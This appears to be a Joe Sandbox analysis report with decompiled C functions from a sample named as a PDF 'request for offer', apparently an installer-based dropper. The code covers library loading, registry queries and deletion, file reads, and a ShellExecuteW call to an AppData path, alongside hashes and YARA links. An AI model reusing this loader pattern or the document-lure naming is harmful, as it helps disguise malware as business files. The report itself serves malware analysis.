Opcode ID: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
Instruction ID: 6f8adcdc05782984f9803186be869087625e4848c31a04748361169110b3332d
Opcode Fuzzy Hash: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
Instruction Fuzzy Hash: 66314A72614205DBD7109F29FEC49663BA9F74039A714423FE900F22E0DBB9AD018B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00402032(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				void* _t34;
				WCHAR* _t37;
				intOrPtr* _t38;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x42a2f8");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42a2c8 =  *0x42a2c8 +  *(_t39 - 4);
					return 0;
				}
				_t37 = E00402C53(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x38)) = E00402C53(1);
				if( *((intOrPtr*)(_t39 - 0x18)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t38 = E0040665B( *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x38)));
					if(_t38 == _t32) {
						E00405371(0xfffffff7,  *((intOrPtr*)(_t39 - 0x38)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x20)) == _t32) {
							 *_t38( *((intOrPtr*)(_t39 - 8)), 0x400, _t34, 0x40cddc, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x20)));
							if( *_t38() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x1c)) == _t32 && E004039FB( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t37); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x00402032
0x00402032
0x00402037
0x0040203e
0x004020fd
0x0040224b
0x0040224b
0x00402adb
0x00402ade
0x00402aea
0x00402aea
0x0040204d
0x00402057
0x0040205a
0x0040206a
0x0040206e
0x00402076
0x00402079
0x004020f6
0x00000000
0x004020f6
0x0040207b
0x00402086
0x0040208a
0x004020ca
0x0040208c
0x0040208f
0x00402092
0x004020be
0x00402094
0x00402097
0x004020a0
0x004020a2
0x004020a2
0x004020a0
0x00402092
0x004020d2
0x004020eb
0x004020eb
0x00000000
0x004020d2
0x0040205d
0x00402065
0x00402068
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D

Part of subcall function 00405371: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
Part of subcall function 00405371: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll,00402EAD), ref: 004053CC
Part of subcall function 00405371: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll), ref: 004053DE
Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040206E
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 8c447d0971d80d1ecd060b7057e50d064390b5f37b68e015e9567a54689141e9
Instruction ID: e4abfbb00710fbb49cfbee30f6c47c6475fc16ace361a0eeed54ffc6686eb32c
Opcode Fuzzy Hash: 8c447d0971d80d1ecd060b7057e50d064390b5f37b68e015e9567a54689141e9
Instruction Fuzzy Hash: EB21AD71900215EBCF206FA5CE4999E7971BF04358F60453BF511B51E0CBBD8982DA6D

Uniqueness

Uniqueness Score: -1.00%

Function 00402511 Relevance: 4.5, APIs: 3, Instructions: 46
registryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00402511(int* __ebx, intOrPtr __edx, short* __esi) {
				void* _t8;
				int _t9;
				long _t12;
				int* _t15;
				intOrPtr _t20;
				void* _t21;
				short* _t23;
				void* _t25;
				void* _t28;

				_t23 = __esi;
				_t20 = __edx;
				_t15 = __ebx;
				_t8 = E00402D5D(_t28, 0x20019); // executed
				_t21 = _t8;
				_t9 = E00402C31(3);
				 *((intOrPtr*)(_t25 - 0x50)) = _t20;
				 *__esi = __ebx;
				if(_t21 == __ebx) {
					L7:
					 *((intOrPtr*)(_t25 - 4)) = 1;
				} else {
					 *(_t25 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t25 - 0x18)) == __ebx) {
						_t12 = RegEnumValueW(_t21, _t9, __esi, _t25 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t12;
						if(_t12 != 0) {
							goto L7;
						} else {
							goto L4;
						}
					} else {
						RegEnumKeyW(_t21, _t9, __esi, 0x3ff); // executed
						L4:
						_t23[0x3ff] = _t15;
						_push(_t21); // executed
						RegCloseKey(); // executed
					}
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t25 - 4));
				return 0;
			}

0x00402511
0x00402511
0x00402511
0x00402516
0x0040251d
0x0040251f
0x00402527
0x0040252a
0x0040252d
0x004028a1
0x004028a1
0x00402533
0x0040253b
0x0040253e
0x00402557
0x0040255d
0x0040255f
0x00000000
0x00000000
0x00000000
0x00000000
0x00402540
0x00402544
0x00402565
0x00402565
0x0040256c
0x0040256d
0x0040256d
0x0040253e
0x00402ade
0x00402aea

APIs

Part of subcall function 00402D5D: RegOpenKeyExW.KERNELBASE(00000000,00000B2F,00000000,00000022,00000000,?,?), ref: 00402D85

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402544
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402557
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsq493.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040256D

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 4060e7dc5290893e85a3f4cf1471f61cb1b5f1c6a3df77b6cd14b2a1e321bf64
Instruction ID: bf3b2bcb6287721b49d379c1e5eb9bed13c1d22dc32754f1d9800637ac4e69b6
Opcode Fuzzy Hash: 4060e7dc5290893e85a3f4cf1471f61cb1b5f1c6a3df77b6cd14b2a1e321bf64
Instruction Fuzzy Hash: 44018F71A04204ABE7109FA59E8CABF766CEF40388F10443EF506A61D0EAF84E419629

Uniqueness

Uniqueness Score: -1.00%

Function 00401E77 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00401E77() {
				short* _t6;
				void* _t16;
				void* _t19;
				void* _t26;

				_t24 = E00402C53(_t19);
				_t6 = E00402C53(0x31);
				_t22 = E00402C53(0x22);
				E00402C53(0x15);
				E00401423(0xffffffec);
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t16 = ShellExecuteW( *(_t26 - 8),  ~( *_t5) & _t24, _t6,  ~( *_t7) & _t22, L"C:\\Users\\Arthur\\AppData\\Local\\Folkedansens\\Suffigere\\Glaucophane",  *(_t26 - 0x1c)); // executed
				if(_t16 < 0x21) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}

0x00401e7f
0x00401e81
0x00401e91
0x00401e93
0x00401e9a
0x00401ea8
0x00401eb8
0x00401ec1
0x00401eca
0x004028a1
0x004028a1
0x00402ade
0x00402aea

APIs

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane,?), ref: 00401EC1

Strings

C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane, xrefs: 00401EAA

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: ExecuteShell
String ID: C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane
API String ID: 587946157-444594325
Opcode ID: adc0ea0e8dd75ebb54359e253ab88b6e654d6423fcd27765654c80a865926f31
Instruction ID: 3dcdd3b781ba8ea7f848cddc5e889496084bd88ab3ad0d62e4dc7728c2b1bbdb
Opcode Fuzzy Hash: adc0ea0e8dd75ebb54359e253ab88b6e654d6423fcd27765654c80a865926f31
Instruction Fuzzy Hash: 35F0C835704511A7DB107BB5DE4AA9D3264DB40758F208576F901F71D1DAFCC9829628

Uniqueness

Uniqueness Score: -1.00%

Function 100028A4 Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00000000), ref: 10002963
GetLastError.KERNEL32 ref: 10002A6A

Memory Dump Source

Source File: 00000002.00000002.54387884763.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.54387828656.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.54387928274.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.54387958519.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0040317B Relevance: 3.1, APIs: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040317B(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a298;
					 *0x418ed4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403283(4);
				if(_t22 >= 0) {
					_t24 = E00405E6A( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x418ed4 =  *0x418ed4 + 4;
						_t36 = E00403283(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x418ed4 =  *0x418ed4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E00405E6A( *0x40a01c, 0x414ed0, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E00405E99(_a8, 0x414ed0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x418ed4 =  *0x418ed4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}

0x0040317f
0x00403188
0x00403191
0x00403195
0x004031a0
0x004031a0
0x004031a8
0x004031af
0x004031c1
0x004031c8
0x0040326d
0x0040326d
0x00000000
0x004031ce
0x004031d1
0x004031dd
0x004031e1
0x0040327b
0x0040327b
0x004031e7
0x004031ea
0x00403249
0x0040324f
0x00403251
0x00403251
0x00403263
0x0040326b
0x00403272
0x00403275
0x00000000
0x00000000
0x00000000
0x00000000
0x004031ec
0x004031ef
0x00000000
0x004031f5
0x004031fa
0x00403201
0x00403204
0x00403206
0x00403206
0x00403213
0x00403216
0x0040321d
0x00000000
0x00000000
0x00403226
0x0040322d
0x00403245
0x0040326f
0x0040326f
0x0040322f
0x0040322f
0x00403232
0x00403235
0x0040323b
0x00403241
0x00000000
0x00403243
0x00000000
0x00403243
0x00403241
0x00000000
0x0040322d
0x00000000
0x004031fa
0x004031ef
0x004031ea
0x004031e1
0x004031c8
0x0040327d
0x00403280

APIs

SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403127,000000FF,00000000,00000000,0040A230,?), ref: 004031A0

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
Instruction ID: 40ace49db037ace229a3e5c96781d28ed7fa856bf3440834985399bb1b02b3fc
Opcode Fuzzy Hash: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
Instruction Fuzzy Hash: 65316B30601219EBDF10DFA5ED84ADA3E68FF04799F20417EF905E6190D7788E509BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040249D Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040249D(int* __ebx, char* __esi) {
				void* _t17;
				short* _t18;
				long _t21;
				void* _t33;
				void* _t37;
				void* _t40;

				_t35 = __esi;
				_t27 = __ebx;
				_t17 = E00402D5D(_t40, 0x20019); // executed
				_t33 = _t17;
				_t18 = E00402C53(0x33);
				 *__esi = __ebx;
				if(_t33 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x50) = 0x800;
					_t21 = RegQueryValueExW(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x50); // executed
					if(_t21 != 0) {
						L7:
						 *_t35 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x18) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
							E00406159(__esi,  *__esi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x18);
								_t35[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t33); // executed
					RegCloseKey(); // executed
				}
				 *0x42a2c8 =  *0x42a2c8 +  *(_t37 - 4);
				return 0;
			}

0x0040249d
0x0040249d
0x004024a2
0x004024a9
0x004024ab
0x004024b2
0x004024b5
0x004028a1
0x004024bb
0x004024be
0x004024ce
0x004024d9
0x00402509
0x00402509
0x0040250c
0x004024db
0x004024df
0x004024f8
0x004024ff
0x00402502
0x004024e1
0x004024e4
0x004024ef
0x00402565
0x00000000
0x00000000
0x00000000
0x004024e4
0x004024df
0x0040256c
0x0040256d
0x0040256d
0x00402ade
0x00402aea

APIs

Part of subcall function 00402D5D: RegOpenKeyExW.KERNELBASE(00000000,00000B2F,00000000,00000022,00000000,?,?), ref: 00402D85

RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024CE
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsq493.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040256D

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 7e45761050f652861b7134423d00d2ed3beb6bcbde8e311c83b1499bd23c447a
Instruction ID: 1238864f951968f7a69ddad796cf6f28c2cd02d7cb81d74efa810d70cc71421c
Opcode Fuzzy Hash: 7e45761050f652861b7134423d00d2ed3beb6bcbde8e311c83b1499bd23c447a
Instruction Fuzzy Hash: D7115471900205EADB14DFA0CA9C5AE77B4EF04345F21843FE142A72D0D6B88A45DB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a270;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42922c =  *0x42922c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42922c, 0x7530,  *0x429214), 0); // executed
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
Instruction ID: d65e0694727b7210e6f7bc09f77efd2c0147e56cffd904cd4a2c980f2ed28b93
Opcode Fuzzy Hash: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
Instruction Fuzzy Hash: 3D01D131724210EBEB195B789D04B2A3698E714314F1089BAF855F62F1DA788C128B5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040238E Relevance: 3.0, APIs: 2, Instructions: 40
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040238E(void* __ebx) {
				short* _t6;
				long _t8;
				void* _t11;
				void* _t15;
				long _t19;
				void* _t22;
				void* _t23;

				_t15 = __ebx;
				_t26 =  *(_t23 - 0x18) - __ebx;
				if( *(_t23 - 0x18) != __ebx) {
					_t6 = E00402C53(0x22);
					_t18 =  *(_t23 - 0x18) & 0x00000002;
					__eflags =  *(_t23 - 0x18) & 0x00000002;
					_t8 = E00402C93(E00402D48( *((intOrPtr*)(_t23 - 0x24))), _t6, _t18); // executed
					_t19 = _t8;
					goto L4;
				} else {
					_t11 = E00402D5D(_t26, 2); // executed
					_t22 = _t11;
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t19 = RegDeleteValueW(_t22, E00402C53(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t19 != _t15) {
							goto L6;
						}
					}
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}

0x0040238e
0x0040238e
0x00402391
0x004023c0
0x004023c8
0x004023c8
0x004023d6
0x004023db
0x00000000
0x00402393
0x00402395
0x0040239a
0x0040239e
0x004028a1
0x004028a1
0x004023a4
0x004023b4
0x004023b6
0x004023dd
0x004023df
0x00000000
0x004023e5
0x004023df
0x0040239e
0x00402ade
0x00402aea

APIs

Part of subcall function 00402D5D: RegOpenKeyExW.KERNELBASE(00000000,00000B2F,00000000,00000022,00000000,?,?), ref: 00402D85

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AD
RegCloseKey.ADVAPI32(00000000), ref: 004023B6

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: 3a3bff4004a2eea24121665fc4b054e16bc69bc3fcc29974d620e59729a4c596
Instruction ID: c0d23e370c25ffca0c370365ac79ff448217ed3cb42859f8984a45efd79f81dd
Opcode Fuzzy Hash: 3a3bff4004a2eea24121665fc4b054e16bc69bc3fcc29974d620e59729a4c596
